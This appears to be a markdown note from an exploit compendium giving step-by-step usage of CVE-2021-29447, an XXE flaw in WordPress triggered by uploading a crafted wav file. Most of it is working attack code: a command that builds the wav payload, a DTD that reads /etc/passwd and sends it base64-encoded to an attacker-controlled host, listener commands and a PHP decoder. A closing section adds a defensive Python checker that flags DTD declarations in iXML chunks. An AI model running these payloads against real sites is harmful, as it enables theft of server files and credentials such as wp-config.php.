killchain-compendium/Exploits/Web/XXE Wordpress.md

2022-11-13 22:38:01 +01:00
# CVE-2021-29447
* Uploading a crafted `wav` file has the following consequences:
  * **Arbitrary File Disclosure**, for example `wp-config.php`
  * **Server Side Request Forgery**
## Usage
* Create the `wav` payload:
```sh
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```
* Create the `dtd` payload, which the WordPress instance downloads from the attacker machine. The payload is as follows:
```xml
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
```
* Launch an HTTP server (either command works):
```sh
# Run one of the two; both listen on port 8000
php -S 0.0.0.0:8000
python -m http.server
```
* Copy the returned base64 into a `php` file to decode it:
```php
<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?>
```
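
A defender-side check for the upload described above, as an added example that is not part of the original notes: it walks the RIFF chunks of a `wav` file and reports `DOCTYPE` or `ENTITY` declarations inside the `iXML` chunk. It assumes that legitimate iXML metadata carries no DTD; the function names and both sample files are constructed for this illustration.

```python
import re
import struct

# Assumption: legitimate iXML metadata never declares a DTD or entities.
DTD_MARKERS = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)

def riff_chunks(data):
    """Yield (chunk_id, payload) for each top-level chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id, size = struct.unpack_from("<4sI", data, pos)
        # Slicing clamps to the bytes present: crafted files often lie about sizes.
        yield chunk_id, data[pos + 8 : pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunks are padded to an even length

def suspicious_ixml(data):
    """Return the DTD markers found in iXML chunks (empty list means clean)."""
    hits = []
    for chunk_id, payload in riff_chunks(data):
        # Compare case-insensitively so a differently cased chunk id is not missed.
        if chunk_id.lower() == b"ixml":
            hits += [m.group(0).decode() for m in DTD_MARKERS.finditer(payload)]
    return hits

def make_wav(ixml):
    """Build a constructed sample: an empty 'data' chunk plus an iXML chunk."""
    def chunk(cid, body):
        return cid + struct.pack("<I", len(body)) + body + b"\x00" * (len(body) & 1)
    body = b"WAVE" + chunk(b"data", b"") + chunk(b"iXML", ixml)
    return b"RIFF" + struct.pack("<I", len(body)) + body

# Constructed samples: ordinary metadata, and metadata declaring an external entity.
CLEAN = make_wav(b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>')
FLAGGED = make_wav(b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % r SYSTEM '
                   b'"http://example.invalid/x.dtd">%r;]><BWFXML/>')

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("flagged", FLAGGED)):
        print(name, suspicious_ixml(sample))
```

Run it over the uploads directory or call `suspicious_ixml()` from an upload hook; any non-empty result is worth quarantining the file for review.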